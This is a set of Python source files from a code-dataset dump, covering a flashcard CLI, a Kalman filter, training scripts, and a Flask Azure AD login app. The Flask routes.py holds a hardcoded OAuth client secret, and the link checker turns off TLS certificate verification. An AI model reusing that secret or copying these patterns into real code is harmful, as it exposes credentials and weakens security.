input(\"Invalid input. Change the back of the card? y/n: \")\n if change_back_choice.lower() == \"y\":\n new_back = input(\"Enter the new back side of the card: \")\n active_card.set_back(new_back)\n\n reset_data_choice = input(\"Do you wish to reset the data of the card? y/n: \")\n while reset_data_choice.lower() != \"y\" and reset_data_choice.lower() != \"n\":\n reset_data_choice = input(\"Invalid input. Reset the data of the card? y/n: \")\n if reset_data_choice.lower() == \"y\":\n active_card.card_reset()\n deck.replace_card(n, active_card)\n\n deck_n = int(input(\"Enter the number of the deck you wish to edit: \"))\n active_deck = arr[deck_n]\n \n print_cards = input(\"Print all cards? y/n: \")\n while print_cards.lower() != \"y\" and print_cards.lower() != \"n\":\n print_cards = input(\"Invalid input. Print all cards? y/n: \")\n if print_cards.lower() == \"y\":\n for i in range(len(active_deck)):\n active_card = active_deck.get_card(i)\n front = active_card.get_front()\n back = active_card.get_back()\n print(\"{}: Front: {}, Back: {}\".format(str(i), front, back))\n \n opt = {0:\"\", 1: main_screen, 2: new_card, 3: delete_card, 4: edit_card}\n txt = [\"Back to decks\", \"Home\", \"New card\", \"Delete card\", \"Edit card\"]\n\n for i in range(len(opt)):\n print(\"{}: {}\".format(str(i), txt[i]))\n n = int(input(\"Option: \"))\n while n != 0:\n if n == 2 or n == 3 or n == 4:\n opt[n](arr[deck_n])\n n = int(input(\"Option: \"))\n if n == 1:\n return opt[n]\n return decks_screen\n\ndef study_screen(arr=deck_arr):\n print(\"Your decks are currently as follows: \")\n for i in range(len(arr)):\n print(\"{}: {}, due: {}\".format(str(i), arr[i].get_title(), arr[i].count_due()))\n n = int(input(\"Enter the number of the deck you wish to study with or -1 to cancel: \"))\n if n == -1:\n return main_screen\n else:\n active_deck = arr[n]\n while active_deck.get_card().is_due():\n data = active_deck.get_card_display()\n print(data[0])\n input(\"Press enter to reveal back side.\")\n print(data[1])\n print(\"Rate your ease of recall. -1 to quit.\")\n performance = int(input(\"0: Failed, 4: Hard, 5: Medium, 6: Easy : \"))\n while performance < -1 or performance > 6:\n performance = int(input(\"0: Failed, 4: Hard, 5: Medium, 6: Easy : \"))\n if performance == -1:\n return study_screen\n active_deck.edit_card(0, performance)\n cont = input(\"Continue? y/n: \")\n while cont.lower() != \"y\" and cont.lower() != \"n\":\n cont = input(\"Invalid input. Continue? y/n: \")\n if cont.lower() == \"n\":\n return study_screen\n print(\"No more cards are due.\")\n return study_screen\n \n####################################################\n# Program loop.\nchosen = main_screen\nwhile chosen != \"q\":\n chosen = chosen()\n save_data()\nelse:\n save_data()\n print(\"Goodbye!\")","sub_path":"flashcardprog.py","file_name":"flashcardprog.py","file_ext":"py","file_size_in_byte":7889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"572172079","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2016 Michael Welter\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n\n'''\n Kalman filter base module.\n'''\n\nimport numpy as np\nimport numpy.matlib as mt\n\n# because the matrix type enables the use of '*' as matrix product instead\n# of element wise multiplication. This is STUPIDLY DANGEROUS as forgotten\n# conversions to matrix will result in element wise multiplication.\n# Still I like to store my data in N x NumStateVars x SomeOtherDimension\n# sized arrays.\nM = mt.asmatrix\n\n\ndef exponentialSmooth(x, dt, T):\n ''' compute IIR filter using simple weighted average of last result and\n current input.\n \n x = array of inputs\n dt = sampling distance\n T = filter window size\n '''\n x = x.copy()\n if hasattr(dt, '__iter__') or hasattr(T, '__iter__'):\n dt = np.resize(np.asarray(dt), (len(x),))\n T = np.resize(np.asarray(T), (len(x),))\n for i in xrange(1, len(x)):\n f = dt[i] / (dt[i] + T[i])\n x[i] = x[i-1] * (1. - f) + x[i] * f\n else:\n f = dt / (dt + T)\n for i in xrange(1, len(x)):\n x[i] = x[i-1] * (1. - f) + x[i] * f\n return x\n\n\ndef deadzoneFilter(x, w):\n '''\n w is the size of the deadzone.\n \n Small variations of the input x are suppressed. If the input 'moves'\n by more than w, the output starts following the input.\n '''\n y = x.copy()\n for i in xrange(1, len(x)):\n dxy = (x[i] - y[i-1])\n if w[i] > 0.:\n f = np.power(np.abs(dxy)/w[i], 4.)\n response = f / (1 + f) * dxy\n y[i] = y[i-1] + response\n else:\n y[i] = x[i]\n return y\n \n \n\n\nclass Constant(object):\n '''\n Always return the same object.\n Lets me write\n A = Constant(M([.....]))\n ....\n a_at_kth_step = A(k)\n Because KF should handle time varying things.\n '''\n def __init__(self, obj):\n self.obj = obj\n \n def __call__(self, k):\n return self.obj\n\n\nclass KalmanFilter(object):\n '''\n You need to set some attributes for this to function, namely\n \n A = process matrix\n Q = process noise cov\n H = measurement matrix\n R = measurement noise cov\n Pminus = initial estimate cov\n '''\n def __init__(self, numStateVars, measurements):\n measurements = np.asarray(measurements)\n self.NZ = NZ = measurements.shape[1]\n self.N = N = measurements.shape[0]\n self.NS = NS = numStateVars\n sz_state = (N, NS, 1)\n sz_cov = (N, NS, numStateVars)\n sz_K = (N, NS, NZ)\n self.I = mt.identity(NS)\n self.xhat = np.zeros(sz_state) # a posteri estimate of x\n self.P = np.zeros(sz_cov) # a posteri error estimate\n self.xhatminus = np.zeros(sz_state) # a priori estimate of x\n self.Pminus = np.zeros(sz_cov) # a priori error estimate\n self.K = np.zeros(sz_K) # gain or blending factor\n self.z = np.reshape(measurements, (N, NZ, 1))\n\n def timeUpdate(self, k):\n A = M(self.A(k))\n self.xhatminus[k] = A * M(self.xhat[k-1])\n Q = M(self.Q(k))\n self.Pminus[k] = A * M(self.P[k-1]) * A.T + Q\n\n def measurementUpdate(self, k):\n z = M(self.z[k])\n H = M(self.H(k))\n R = M(self.R(k))\n Pminus = M(self.Pminus[k])\n xhatminus = M(self.xhatminus[k])\n # measurement update\n self.K[k] = K = Pminus * H.T * np.linalg.inv( H * Pminus * H.T + R )\n self.xhat[k] = xhatminus + K * (z - H * xhatminus)\n self.P[k] = ( self.I - K * H ) * Pminus\n\n def run(self):\n self.P[0] = self.initialP\n self.Pminus[0] = self.initialP\n for k in xrange(1, self.N):\n self.timeUpdate(k)\n self.measurementUpdate(k)\n\n @property\n def output(self):\n return self.xhat[:,:,0]\n\n\n\nclass QScalingBase(object):\n '''\n Can be used as Q in KalmanFilter using composition like so\n kf = KalmanFilter\n kf.Q = QScalingSomething(kf, something)\n ...\n '''\n def __init__(self, kf, L, exponent):\n self.kf = kf\n self.L = L\n self.exponent = exponent\n N, NZ, NS = kf.N, kf.NZ, kf.NS\n self.alpha = np.ones(N)\n self.Qhat = np.zeros((N, NS, NS))\n self.d = np.zeros((N, NZ, 1))\n self.D = np.zeros((N, NZ, NZ))\n\n def __call__(self, k):\n L = self.L\n self.d[k] = d = self.kf.z[k] - self.kf.H(k) * M(self.kf.xhatminus[k])\n self.D[k] = self.D[k-1] * (L-1.)/L + (M(d) * M(d).T) * (1./L)\n Q = self.calculateQ(k)\n self.Qhat[k] = Q\n return Q\n\n\nclass Qscaling1(QScalingBase):\n '''\n Inspired by \"Improving Adaptive Kalman Filter in GPS/SDINS Integration \n with Neural Network\" by Wang et al. Eq. (21).\n Q[k] = K E{d[k] d[k]T} KT. \n E{ ... } is estimated expectation by time average. \n d[k] is the series of inovations: d[k] = z[k] - H x[k]^-\n \n Big limitation: only predictions the \"position\" entry of Q[k],\n i.e. the position variance.\n Therefore I use the baseline Q and scale it so that Q[k][1,1]\n matches the estimated position variance.\n ''' \n def calculateQ(self, k):\n baseQ = M(self.Q(k))\n K = M(self.kf.K[k-1])\n D = M(self.D[k])\n \n Qest = K * D * K.T\n #print D, K\n\n f = mt.trace(Qest) / mt.trace(baseQ)\n f = np.power(f, self.exponent)\n f = min(10000000., f)\n Q = baseQ * f\n self.alpha[k] = f\n return Q\n\n\nclass Qscaling2(QScalingBase):\n '''\n Inspired by \"Improving Adaptive Kalman Estimation in GPS/INS Integration\" by Ding et al. (2007).\n Scale Q[k] by some factor derived from the estimated cov of the inovation sequence. \n '''\n def calculateQ(self, k):\n Q = M(self.Q(k))\n R = M(self.kf.R(k))\n H = M(self.kf.H(k))\n D = M(self.D[k-1])\n \n alpha = np.trace(D - R) / np.trace(H * M(self.kf.Pminus[k-1]) * H.T)\n alpha = np.asscalar(alpha)\n if np.isfinite(alpha) and alpha>0:\n alpha = np.power(alpha, self.exponent)\n alpha = max(0.0001, min(alpha, 1000.*mt.trace(R) / mt.trace(Q)))\n else:\n alpha = 0.0001\n Q = Q * alpha\n self.alpha[k] = alpha\n return Q\n","sub_path":"kalmanfilter.py","file_name":"kalmanfilter.py","file_ext":"py","file_size_in_byte":6305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"193576187","text":"import views\n\nfrom framework import Application\n\n\n\nroutes = {\n '/': views.index_view,\n '/black/': views.black_view,\n '/red/': views.red_view,\n '/white/': views.white_view,\n '/other/': views.Other(),\n '/about/': views.about_view,\n '/contact/': views.contact_view,\n '/random/': views.random_view\n}\n\n\n# Front controllers\ndef opposite_color_front(request):\n request['opposite_color'] = 'opposite color'\n\n\ndef similar_color_front(request):\n request['similar_color'] = 'similar color'\n\nfronts = [opposite_color_front, similar_color_front]\napplication = Application(routes, fronts)\n\n# uwsgi --http :8000 --wsgi-file main.py\n","sub_path":"lesson_02/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"111206435","text":"import itertools\nimport math\n\nimport numpy\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch import Tensor\nfrom torch.nn import Linear, MSELoss\nfrom torch.nn import functional as F\nfrom torch.optim import SGD, Adam\n\nimport wandb\nfrom datasets import get_datasets\nfrom log_utils import AverageMeter, wandb_auth\nfrom utils import (\n data_generator,\n eval_features,\n featurize,\n hessian,\n jacobian,\n)\nfrom models import SoTLNet\nfrom sotl_utils import sotl_gradient, WeightBuffer\nimport scipy.linalg\nimport time\nimport fire\n\ndef train_bptt(\n num_epochs: int,\n model,\n criterion,\n w_optimizer,\n a_optimizer,\n dset_train,\n dset_val,\n batch_size: int,\n T: int,\n w_checkpoint_freq: int,\n grad_clip: float,\n w_lr: float,\n logging_freq: int,\n grad_inner_loop_order: int,\n grad_outer_loop_order:int,\n hvp: str,\n arch_train_data:str,\n normalize_a_lr:bool,\n log_grad_norm:bool,\n log_alphas:bool,\n w_warm_start:int,\n extra_weight_decay:float\n):\n train_loader = torch.utils.data.DataLoader(\n dset_train, batch_size=batch_size * T, shuffle=True\n )\n val_loader = torch.utils.data.DataLoader(dset_val, batch_size=batch_size)\n grad_compute_speed = AverageMeter()\n\n for epoch in range(num_epochs):\n model.train()\n\n epoch_loss = AverageMeter()\n true_batch_index = 0\n \n val_iter = iter(val_loader)\n for batch_idx, batch in enumerate(train_loader):\n\n\n xs, ys = torch.split(batch[0], batch_size), torch.split(\n batch[1], batch_size\n )\n\n weight_buffer = WeightBuffer(T=T, checkpoint_freq=w_checkpoint_freq)\n for intra_batch_idx, (x, y) in enumerate(zip(xs, ys)):\n weight_buffer.add(model, intra_batch_idx)\n\n y_pred = model(x)\n\n param_norm = 0\n if extra_weight_decay is not None and extra_weight_decay != 0:\n for weight in model.weight_params():\n param_norm = param_norm + torch.pow(weight.norm(2), 2)\n \n \n loss = criterion(y_pred, y) + param_norm\n epoch_loss.update(loss.item())\n\n grads = torch.autograd.grad(\n loss,\n model.weight_params(),\n retain_graph=True,\n create_graph=True,\n )\n\n w_optimizer.zero_grad()\n\n with torch.no_grad():\n for g, w in zip(grads, model.weight_params()):\n w.grad = g\n torch.nn.utils.clip_grad_norm_(model.parameters(), 1)\n\n w_optimizer.step()\n true_batch_index += 1\n wandb.log(\n {\n \"Train loss\": epoch_loss.avg,\n \"Epoch\": epoch,\n \"Batch\": true_batch_index,\n }\n )\n\n if true_batch_index % logging_freq == 0:\n print(\n \"Epoch: {}, Batch: {}, Loss: {}, Alphas: {}\".format(\n epoch,\n true_batch_index,\n epoch_loss.avg,\n [x.data for x in model.arch_params()],\n )\n )\n\n val_xs = None\n val_ys = None\n if arch_train_data == \"val\":\n try:\n val_batch = next(val_iter)\n val_xs, val_ys = torch.split(val_batch[0], batch_size), torch.split(\n val_batch[1], batch_size\n )\n\n except:\n val_iter = iter(val_loader)\n val_batch = next(val_iter)\n val_xs, val_ys = torch.split(val_batch[0], batch_size), torch.split(\n val_batch[1], batch_size\n )\n\n\n if epoch >= w_warm_start:\n start_time = time.time()\n total_arch_gradient = sotl_gradient(\n model=model,\n criterion=criterion,\n xs=xs,\n ys=ys,\n weight_buffer=weight_buffer,\n w_lr=w_lr,\n hvp=hvp,\n inner_loop_order=grad_inner_loop_order,\n outer_loop_order=grad_outer_loop_order,\n T=T,\n normalize_a_lr=normalize_a_lr,\n weight_decay_term=None,\n val_xs=val_xs,\n val_ys=val_ys\n )\n grad_compute_speed.update(time.time() - start_time)\n\n\n if log_grad_norm:\n norm = 0\n for g in total_arch_gradient:\n norm = norm + g.data.norm(2).item()\n wandb.log({\"Arch grad norm\": norm})\n\n if log_alphas:\n if hasattr(model, \"fc1\") and hasattr(model.fc1, \"degree\"):\n wandb.log({\"Alpha\":model.fc1.degree.item()})\n\n a_optimizer.zero_grad()\n\n for g, w in zip(total_arch_gradient, model.arch_params()):\n w.grad = g\n torch.nn.utils.clip_grad_norm_(model.arch_params(), 1)\n a_optimizer.step()\n\n val_results = valid_func(\n model=model, dset_val=dset_val, criterion=criterion, print_results=False\n )\n print(\"Epoch: {}, Val Loss: {}\".format(epoch, val_results.avg))\n wandb.log({\"Val loss\": val_results.avg, \"Epoch\": epoch})\n wandb.run.summary[\"Grad compute speed\"] = grad_compute_speed.avg\n\n print(f\"Grad compute speed: {grad_compute_speed.avg}s\")\n\n\ndef valid_func(model, dset_val, criterion, print_results=True):\n model.eval()\n val_loader = torch.utils.data.DataLoader(dset_val, batch_size=32)\n\n val_meter = AverageMeter()\n with torch.no_grad():\n for batch in val_loader:\n x, y = batch\n y_pred = model(x)\n val_loss = criterion(y_pred, y)\n val_meter.update(val_loss.item())\n if print_results:\n print(\"Val loss: {}\".format(val_meter.avg))\n return val_meter\n\n\ndef train_normal(\n num_epochs, model, dset_train, batch_size, grad_clip, logging_freq, optim=\"sgd\", **kwargs\n):\n train_loader = torch.utils.data.DataLoader(\n dset_train, batch_size=batch_size, shuffle=True\n )\n\n model.train()\n for epoch in range(num_epochs):\n\n epoch_loss = AverageMeter()\n for batch_idx, batch in enumerate(train_loader):\n x, y = batch\n w_optimizer.zero_grad()\n\n y_pred = model(x)\n loss = criterion(y_pred, y)\n loss.backward(retain_graph=True)\n\n epoch_loss.update(loss.item())\n if optim == \"newton\":\n linear_weight = list(model.weight_params())[0]\n hessian_newton = torch.inverse(\n hessian(loss * 1, linear_weight, linear_weight).reshape(\n linear_weight.size()[1], linear_weight.size()[1]\n )\n )\n with torch.no_grad():\n for w in model.weight_params():\n w = w.subtract_(torch.matmul(w.grad, hessian_newton))\n elif optim ==\"sgd\":\n torch.nn.utils.clip_grad_norm_(model.weight_params(), 1)\n w_optimizer.step()\n else:\n raise NotImplementedError\n \n wandb.log(\n {\"Train loss\": epoch_loss.avg, \"Epoch\": epoch, \"Batch\": batch_idx}\n )\n\n if batch_idx % logging_freq == 0:\n print(\n \"Epoch: {}, Batch: {}, Loss: {}, Alphas: {}\".format(\n epoch, batch_idx, epoch_loss.avg, model.fc1.alphas.data\n )\n )\n\n\ndef main(num_epochs = 50,\n batch_size = 64,\n D = 18,\n N = 50000,\n w_lr = 1e-4,\n w_momentum=0.9,\n w_weight_decay=0,\n a_lr = 3e-4,\n a_momentum = 0.9,\n a_weight_decay = 0,\n T = 10,\n grad_clip = 1,\n logging_freq = 200,\n w_checkpoint_freq = 1,\n max_order_y=7,\n noise_var=0.25,\n featurize_type=\"fourier\",\n initial_degree=100,\n hvp=\"finite_diff\",\n arch_train_data=\"val\",\n normalize_a_lr=True,\n w_warm_start=0,\n extra_weight_decay=0.5,\n grad_inner_loop_order=-1,\n grad_outer_loop_order=-1,\n ):\n config = locals()\n\n wandb_auth()\n wandb.init(project=\"NAS\", group=f\"Linear_SOTL\", config=config)\n\n ### MODEL INIT\n # x, y = data_generator(N, max_order_generated=D, max_order_y=[(5,7), (9,13)], noise_var=0.25, featurize_type='fourier')\n # x, y = get_datasets(\"songs\")\n\n dset_train, dset_val = get_datasets(name=\"MNIST\", data_size=N, max_order_generated=D,\n max_order_y=max_order_y,\n noise_var=noise_var,\n featurize_type=featurize_type)\n\n model = SoTLNet(num_features=int(len(dset_train[0][0])), layer_type=\"MNIST\", degree=-1, weight_decay=extra_weight_decay)\n\n \n\n criterion = get_criterion(model_type)\n w_optimizer = SGD(model.weight_params(), lr=w_lr, momentum=w_momentum, weight_decay=w_weight_decay)\n a_optimizer = SGD(model.arch_params(), lr=a_lr, momentum=a_momentum, weight_decay=a_weight_decay)\n\n wandb.watch(model, log=\"all\")\n train_bptt(\n num_epochs=num_epochs,\n model=model,\n criterion=criterion,\n w_optimizer=w_optimizer,\n a_optimizer=a_optimizer,\n dset_train=dset_train,\n dset_val=dset_val,\n logging_freq=logging_freq,\n batch_size=batch_size,\n T=T,\n grad_clip=grad_clip,\n w_lr=w_lr,\n w_checkpoint_freq=w_checkpoint_freq,\n grad_inner_loop_order=grad_inner_loop_order,\n grad_outer_loop_order=grad_outer_loop_order,\n hvp=hvp,\n arch_train_data=arch_train_data,\n normalize_a_lr=normalize_a_lr,\n log_grad_norm=True,\n log_alphas=True,\n w_warm_start=w_warm_start,\n extra_weight_decay=extra_weight_decay\n )\n # train_normal(num_epochs=num_epochs, model=model, dset_train=dset_train,\n # logging_freq=logging_freq, batch_size=batch_size, grad_clip=grad_clip, optim=\"sgd\")\n\n lapack_solution, res, eff_rank, sing_values = scipy.linalg.lstsq(x, y)\n print(f\"Cond number:{abs(sing_values.max()/sing_values.min())}\")\n\n val_meter = valid_func(model=model, dset_val=dset_val, criterion=criterion)\n\n model.fc1.weight = torch.nn.Parameter(torch.tensor(lapack_solution))\n\n val_meter2 = valid_func(model=model, dset_val=dset_val, criterion=criterion)\n\n print(\n f\"Trained val loss: {val_meter.avg}, SciPy solver val loss: {val_meter2.avg}, difference: {val_meter.avg - val_meter2.avg} (ie. {(val_meter.avg/val_meter2.avg-1)*100}% more)\"\n )\n\n true_degree = max_order_y/2 \n trained_degree = model.fc1.alphas.item()\n print(f\"True degree: {true_degree}, trained degree: {trained_degree}, difference: {abs(true_degree - trained_degree)}\")\n wandb.run.summary[\"degree_mismatch\"] = abs(true_degree-trained_degree)\n\nif __name__ == \"__main__\":\n try:\n __IPYTHON__\n main()\n\n except KeyboardInterrupt:\n pass\n except:\n fire.Fire(main)\n\n\nnum_epochs = 50\nbatch_size = 64\nD = 18\nN = 50000\nw_lr = 1e-3\nw_momentum=0.9\nw_weight_decay=0.1\na_lr = 3e-3\na_momentum = 0.9\na_weight_decay = 0.2\nT = 10\ngrad_clip = 1\nlogging_freq = 200\nw_checkpoint_freq = 1\nmax_order_y=7\nnoise_var=0.25\nfeaturize_type=\"fourier\"\ninitial_degree=1\nhvp=\"exact\"\nnormalize_a_lr=True\nw_warm_start=0\nextra_weight_decay=1\ngrad_inner_loop_order=-1\ngrad_outer_loop_order=-1","sub_path":"linear/luketina.py","file_name":"luketina.py","file_ext":"py","file_size_in_byte":11804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"444919924","text":"# -*- coding: utf-8 -*-\n\nimport os\n#文件的路径 放到这里\nfile_past=os.path.realpath(__file__)\n# print(file_past)\nproject_path=os.path.split(os.path.split(os.path.realpath(__file__))[0])[0]\n# print(project_path)\n\n#测试用例的路径\ncase_path=os.path.join(project_path,'data','test_api_1.xlsx')\n\n#日志的路径\nlog_path=os.path.join(project_path,'test_result','test_log','test.log')\n\n#测试报告的路径\nreport_path=os.path.join(project_path,'test_result','test_report','QcdTestRepore.html')\n\n#配置文件的路径\nconf_path=os.path.join(project_path,'conf','api_test.conf')\n\nif __name__ == '__main__':\n print(file_past)\n print(project_path)\n print(conf_path)\n print(case_path)\n","sub_path":"common/project_path.py","file_name":"project_path.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"502591273","text":"import adal\nfrom app import app\nfrom flask import Flask, request, Response\nimport uuid\nimport requests\nimport urllib\n\nCLIENT_ID = 'a273ed9e-915c-4e0f-9109-ec2541deb7b5'\nCLIENT_SECRET = 'F*denrd?/+pHjNV7lKcO6K309b?t9gHE'\nBASEURL = 'http://localhost:3000'\nRESOURCE = 'https://graph.microsoft.com'\nAPI_VERSION = 'v1.0'\nTENANT = 'am.amrita.edu'\nAUTHORITY_URL = 'https://login.microsoftonline.com/' + TENANT\nREDIRECT_URI = BASEURL + '/getAToken'\nAUTHORIZE_URL = 'https://login.microsoftonline.com/am.amrita.edu/oauth2/authorize?'+'response_type=code&client_id='+ CLIENT_ID +'&redirect_uri={}/getAToken'+'&'+'state={}'\n\n@app.route(\"/\")\ndef main():\n return \"IDENTITY\"\n\n@app.route(\"/auth/\")\ndef auth_begin():\n return \"Hello\"\n\n@app.route(\"/id/authorize/\")\ndef login():\n client_id = request.args['client_id']\n client_redirect_uri = request.args['redirect_uri']\n redirect_uri = BASEURL + '/microsoft/token?client_id={}&redirect_uri={}'.format(client_id, urllib.quote(client_redirect_uri))\n auth_state = str(uuid.uuid4())\n resp = Response(status=307)\n resp.headers['location'] = AUTHORIZE_URL.format(urllib.quote(redirect_uri), auth_state)\n return resp\n\n@app.route(\"/microsoft/token\")\ndef main_logic():\n code = request.args['code']\n auth_context = adal.AuthenticationContext(AUTHORITY_URL)\n clientid = request.args['client_id']\n token_response = auth_context.acquire_token_with_authorization_code(code, REDIRECT_URI, 'https://graph.microsoft.com', CLIENT_ID, CLIENT_SECRET)\n token = token_response['accessToken']\n print(token)\n endpoint = RESOURCE + '/' + API_VERSION + '/me/'\n http_headers = {'Authorization': 'Bearer ' + token,\n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n 'client-request-id': str(uuid.uuid4())}\n print(http_headers)\n graph_data = requests.get(endpoint, headers=http_headers, stream=False).json()\n return graph_data","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"236909290","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nimport time\nimport datetime\nimport sys\nimport logging\nimport tempfile\nimport gzip\nimport json\nfrom collections import defaultdict\n\nimport lmdb\n\nimport requests\nimport asyncio\nfrom functools import partial\nfrom requests.models import Response\nimport urllib\nfrom urllib.request import urlopen\nimport traceback\nimport unicodecsv\nimport codecs\n\nproxy= os.environ['http_proxy']\ntemp_db = '/tmp/od_linkcheker2.db'\n\ndef test_ftp(url):\n res = Response()\n try:\n req = urllib.request.Request(url)\n if proxy:\n req.set_proxy(proxy, 'http')\n response = urlopen(req, timeout=30)\n chunk = response.read(16)\n if len(chunk) == 16:\n res.status_code = 200\n else:\n res.status_code = 404\n except:\n res.status_code = 404\n print(url, res.status_code)\n return res\n\nUSER_AGENT=\"open.canada.ca dataset link checker; abuse report open-ouvert@tbs-sct.gc.ca\"\n\n\ndef get_a_byte(response, *args, **kwargs):\n if response.status_code == requests.codes.ok:\n count = 0\n for line in response.iter_content():\n count += (len(line))\n if count > 0:\n print(response.url, count)\n response.close()\n break\n\n\n@asyncio.coroutine\ndef test_urls(urls, results):\n loop = asyncio.get_event_loop()\n futures =[]\n for url in urls:\n if url[:6].lower() =='ftp://':\n future = loop.run_in_executor(None, test_ftp,url)\n else:\n future = loop.run_in_executor(None, partial(requests.get, headers={\"user-agent\":USER_AGENT},\n hooks={'response': get_a_byte}, verify=False,\n timeout=30, stream=True), url)\n futures.append(future)\n for future in futures:\n try:\n res = yield from future\n except requests.exceptions.ProxyError:\n print('proxy error', urls[ futures.index(future)])\n res = Exception()\n except requests.exceptions.ReadTimeout:\n print('timeout', urls[ futures.index(future)])\n res = Exception()\n except (requests.exceptions.InvalidSchema, requests.exceptions.InvalidURL):\n print('invalidURL', urls[ futures.index(future)])\n res = Response()\n res.status_code = 404\n except:\n import traceback\n traceback.print_exc()\n res = Exception()\n results.append(res)\n\n\nclass Records():\n def __init__(self, file, verbose):\n self.file = file\n self.download_file = None\n self.verbose = verbose\n mapsize = 100 * 1024 * 1024 * 1024\n self.env = lmdb.open(temp_db, map_size=mapsize, sync=False)\n #self.txn = self.env.begin(write=True)\n\n #p_records = site.action.current_package_list_with_resources( offset=start, limit=rows)\n def __delete__(self):\n self.env.close()\n if not self.file:\n if self.download_file:\n os.unlink(self.download_file)\n print('temp file deleted', self.download_file)\n\n def download(self):\n if not self.file:\n # dataset http://open.canada.ca/data/en/dataset/c4c5c7f1-bfa6-4ff6-b4a0-c164cb2060f7\n url='http://open.canada.ca/static/od-do-canada.jl.gz'\n r = requests.get(url, stream=True)\n\n f = tempfile.NamedTemporaryFile(delete=False)\n for chunk in r.iter_content(1024 * 64):\n f.write(chunk)\n f.close()\n self.download_file = f.name\n\n records = []\n fname = self.file or f.name\n try:\n with gzip.open(fname, 'rb') as fd:\n for line in fd:\n records.append(json.loads(line.decode('utf-8')))\n if len(records) >= 50:\n yield (records)\n records = []\n if len(records) >0:\n yield (records)\n except GeneratorExit:\n pass\n except:\n import traceback\n traceback.print_exc()\n print('error reading downloaded file')\n\n def test_links(self, new_url, urls):\n links = []\n results = []\n for k,v in new_url.items():\n links.append(k)\n loop = asyncio.get_event_loop()\n loop.run_until_complete(test_urls(links, results))\n with self.env.begin(write=True) as txn:\n now = time.time()\n results = zip(links, results)\n for url, response in results:\n if type(response) is Exception:\n res={'timestamp': now,\n 'status': -1,\n 'resources': new_url[url]}\n else:\n res={'timestamp': now,\n 'status':response.status_code}\n if response.status_code != requests.codes.ok:\n res['resources'] = new_url[url]\n res['org'] = urls.get(url, None)\n txn.put(url.encode('utf-8'), json.dumps(res).encode('utf-8'))\n if links:\n time.sleep(5) # break\n\n def get_resources(self):\n count = 0\n new_url = defaultdict(list)\n urls = {}\n for records in self.download():\n now = time.time()\n count += len(records)\n with self.env.begin() as txn:\n for record in records:\n id = record['id']\n for res in record['resources']:\n if (not res['url_type']) and res.get('url'):\n #print(res)\n url= res['url']\n details =txn.get(url.encode('utf-8'))\n if details:\n details = json.loads(details.decode('utf-8'))\n if False: #short re-run test\n if now - details.get('timestamp', 0) < 34 * 3600 and (details['status']!= -1):\n continue\n #if details['status'] == requests.codes.ok:\n if False:\n if details['status'] != -1 or url[:7]!='http://':\n continue\n if details['status'] == requests.codes.ok:\n continue\n new_url[url].append('/'.join([id, res['id']]))\n if record.get('organization'):\n urls[url]={'name': record['organization']['name'],\n 'title': record['organization']['title']}\n if len(new_url) >=500:\n self.test_links(new_url, urls)\n new_url = defaultdict(list)\n urls = {}\n if new_url:\n self.test_links(new_url, urls)\n print ('total record count: ', count)\n\n def dumpBrokenLink(self):\n outf=open('/tmp/brokenlink.csv', 'wb')\n outf.write(codecs.BOM_UTF8)\n out = unicodecsv.writer(outf)\n out.writerow(['organization name', 'status', 'link', 'dataset_id/resource_id'])\n data = defaultdict(list)\n with self.env.begin() as txn:\n for url, value in txn.cursor():\n details = json.loads(value.decode('utf-8'))\n if details['status'] != requests.codes.ok:\n #print(url.decode('utf-8'), details)\n org_name = details['org']['name'] if details.get('org') else 'unknown_org'\n data[org_name].append([url, details['resources'], details['status']])\n count, count2 = 0, 0\n for name, urls in data.items():\n for url, res, status in urls:\n status_str = status if status!= -1 else 'timeout'\n out.writerow([name, status_str, url.decode('utf-8'), json.dumps(res)])\n count += 1\n if status ==-1:\n count2 += 1\n outf.close()\n print(self.env.info())\n print(self.env.stat())\n print('total {0} dumped, timeout_count {1}'.format(count, count2))\n\n def dumpBrokenLink_v2(self):\n outf=open('/tmp/brokenlink.csv', 'wb')\n outf.write(codecs.BOM_UTF8)\n out = unicodecsv.writer(outf)\n #Header\n out.writerow(['Metadata ID / Métadonnées ID',\n 'Metadata Record Portal Type / Type de portail de la record de métadonnées',\n 'Metadata Record Name English / Nom de la record de la métadonnées anglais',\n 'Metadata Record Name French / Nom de la record de la métadonnées français',\n \"Department Name English / Nom d'département d'anglais\",\n \"Department Name French / Nom département de français\",\n \"Resource Name English/ Non de la resource angalis\",\n \"Resource Name French/ Non de la resource français\",\n \"Year / Année\",\n \"Month / Mois\",\n \"Broken Link / Lien brisé\",\n \"Status / Statut\", \n ])\n data = {}\n with self.env.begin() as txn:\n for url, value in txn.cursor():\n details = json.loads(value.decode('utf-8'))\n if details['status'] != requests.codes.ok:\n #print(url.decode('utf-8'), details)\n for res_id in details['resources']:\n data[res_id] = {'status':details['status']}\n\n for records in self.download():\n for record in records:\n id = record['id']\n for res in record['resources']:\n if (not res['url_type']) and res.get('url'):\n #print(res)\n url= res['url']\n full_id = '/'.join([id, res['id']])\n detail = data.get(full_id, None)\n if not detail: continue\n time_str = res.get('last_modified')\n if not time_str:\n time_str = res.get('created')\n try:\n timestamp = datetime.datetime.strptime(time_str, \"%Y-%m-%dT%H:%M:%S.%f\")\n except:\n timestamp = None\n detail.update({\n 'metadata_id': full_id,\n 'portal_type': record['type'],#record['collection'],\n 'record_name_en': record['title_translated']['en'],\n 'record_name_fr': record['title_translated']['fr'], \n 'org_name_en': record['organization']['title'].split('|')[0],\n 'org_name_fr': record['organization']['title'].split('|')[-1],\n 'name_en': res['name_translated']['en'],\n 